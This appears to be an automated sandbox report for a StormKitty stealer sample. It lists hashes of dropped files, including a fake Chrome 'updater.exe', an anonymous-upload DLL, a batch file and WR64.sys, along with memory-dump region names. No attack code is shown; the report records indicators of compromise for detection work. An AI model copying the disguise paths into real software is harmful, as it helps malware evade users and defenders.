\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

MD5 7b8fcb29905e045b7f8c1dc9bc305698
SHA1 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512 d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

MD5 7b8fcb29905e045b7f8c1dc9bc305698
SHA1 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512 d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2

memory/2632-68-0x000000013F740000-0x000000013F790000-memory.dmp

memory/2232-69-0x000000013F270000-0x000000013F68E000-memory.dmp

memory/2232-70-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2632-71-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2632-72-0x0000000002160000-0x00000000021D4000-memory.dmp

memory/2232-73-0x000000001B380000-0x000000001B400000-memory.dmp

memory/2632-74-0x00000000021D0000-0x00000000021D6000-memory.dmp

memory/1920-79-0x000000001B210000-0x000000001B4F2000-memory.dmp

memory/1920-80-0x00000000027B0000-0x00000000027B8000-memory.dmp

memory/1920-81-0x000007FEEF000000-0x000007FEEF99D000-memory.dmp

memory/1920-82-0x00000000027C0000-0x0000000002840000-memory.dmp

memory/1920-83-0x000007FEEF000000-0x000007FEEF99D000-memory.dmp

memory/1920-84-0x000007FEEF000000-0x000007FEEF99D000-memory.dmp

memory/2232-85-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2632-86-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2232-87-0x000000001B380000-0x000000001B400000-memory.dmp

memory/2632-88-0x000000001B9A0000-0x000000001BA20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll

MD5 6d1c62ec1c2ef722f49b2d8dd4a4df16
SHA1 1bb08a979b7987bc7736a8cfa4779383cb0ecfa6
SHA256 00da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c
SHA512 c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2

C:\Users\Admin\AppData\Local\Temp\AnonFileApi.dll

MD5 7a2d5deab61f043394a510f4e2c0866f
SHA1 ca16110c9cf6522cd7bea32895fd0f697442849b
SHA256 75db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69
SHA512 b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

memory/2232-100-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpCE85.tmp.bat

MD5 e87b986da2d91d9cc2203e6f12bdb13d
SHA1 729e54e08a5cc0784f4d90220a8a1298a6410145
SHA256 44eeec4e1ef502fe97433d8588b09fc2e05d65079a3d1f3e071cbd1ae645cf56
SHA512 6c5bf1a7c2290a0890534697ad41de4b5ee2821047c328fe279ef580a986ad67821493a15c0f18b6c012e852f34f4f42717c9181bffa12d8328100c90ccfac79

\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

memory/1900-107-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2632-108-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/1900-109-0x000000013FAD0000-0x000000013FEEE000-memory.dmp

memory/1900-110-0x000000001BCB0000-0x000000001BD30000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d0bf3f094fc677a52e2f7f063edf2c85
SHA1 df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA256 47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512 a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\07CGK9RARWSQRHXDB2S5.temp

MD5 d0bf3f094fc677a52e2f7f063edf2c85
SHA1 df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA256 47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512 a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d

memory/1744-117-0x000007FEF2A40000-0x000007FEF33DD000-memory.dmp

memory/1744-118-0x000000001B400000-0x000000001B6E2000-memory.dmp

memory/1744-119-0x000007FEF2A40000-0x000007FEF33DD000-memory.dmp

memory/1744-121-0x0000000001F90000-0x0000000001F98000-memory.dmp

memory/1744-122-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/1744-120-0x0000000002850000-0x00000000028D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AnonFileApi.dll

MD5 7a2d5deab61f043394a510f4e2c0866f
SHA1 ca16110c9cf6522cd7bea32895fd0f697442849b
SHA256 75db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69
SHA512 b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0

C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll

MD5 6d1c62ec1c2ef722f49b2d8dd4a4df16
SHA1 1bb08a979b7987bc7736a8cfa4779383cb0ecfa6
SHA256 00da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c
SHA512 c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2

memory/1744-125-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/1744-126-0x000007FEF2A40000-0x000007FEF33DD000-memory.dmp

memory/1900-127-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/1900-128-0x000000001BCB0000-0x000000001BD30000-memory.dmp

memory/1900-129-0x00000000007A0000-0x00000000007A6000-memory.dmp

memory/2028-130-0x0000000000060000-0x0000000000067000-memory.dmp

memory/2028-132-0x0000000000060000-0x0000000000067000-memory.dmp

memory/2028-134-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/1900-135-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2028-136-0x000000001A790000-0x000000001A810000-memory.dmp

memory/2028-137-0x0000000001B20000-0x0000000001B26000-memory.dmp

memory/2028-138-0x000000001A790000-0x000000001A810000-memory.dmp

memory/2028-139-0x000000001A790000-0x000000001A810000-memory.dmp

memory/2028-140-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2028-141-0x000000001A790000-0x000000001A810000-memory.dmp

memory/2028-142-0x000000001A790000-0x000000001A810000-memory.dmp

memory/2028-143-0x000000001A790000-0x000000001A810000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d0bf3f094fc677a52e2f7f063edf2c85
SHA1 df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA256 47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512 a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d

memory/2352-149-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp

memory/2352-150-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp

memory/2352-151-0x0000000002480000-0x0000000002500000-memory.dmp

memory/2352-152-0x0000000002480000-0x0000000002500000-memory.dmp

memory/2352-153-0x0000000002480000-0x0000000002500000-memory.dmp

memory/2352-154-0x0000000002480000-0x0000000002500000-memory.dmp

memory/2352-155-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp

\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

memory/2948-158-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2948-159-0x000000013F2C0000-0x000000013F6DE000-memory.dmp

memory/2948-160-0x000000001BCD0000-0x000000001BD50000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 34dc4454196f0ad68db18c132e5e281c
SHA1 b0ce0637ccbe63c97177fa298098deb9a1207d91
SHA256 8ef8c0b7fcfe8ec307019ea0de462a7004de826415a941f9124fabed3a1a8995
SHA512 65cc1698795f46c1bdf3d70110932159e37ed363514b82b137b4ef0022f84fb7566f1c88014d61982f2b4a7cae4ae35fa8a8ac12fb4dcd3b28ef8f60709a27a8

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2940-167-0x000007FEEE3C0000-0x000007FEEED5D000-memory.dmp

memory/2940-168-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2940-169-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2940-170-0x000007FEEE3C0000-0x000007FEEED5D000-memory.dmp

memory/2940-171-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2940-172-0x000007FEEE3C0000-0x000007FEEED5D000-memory.dmp

memory/2948-173-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

memory/2948-174-0x000000001BCD0000-0x000000001BD50000-memory.dmp

C:\Users\Admin\AppData\Roaming\Google\Libs\WR64.sys

MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

memory/2948-177-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp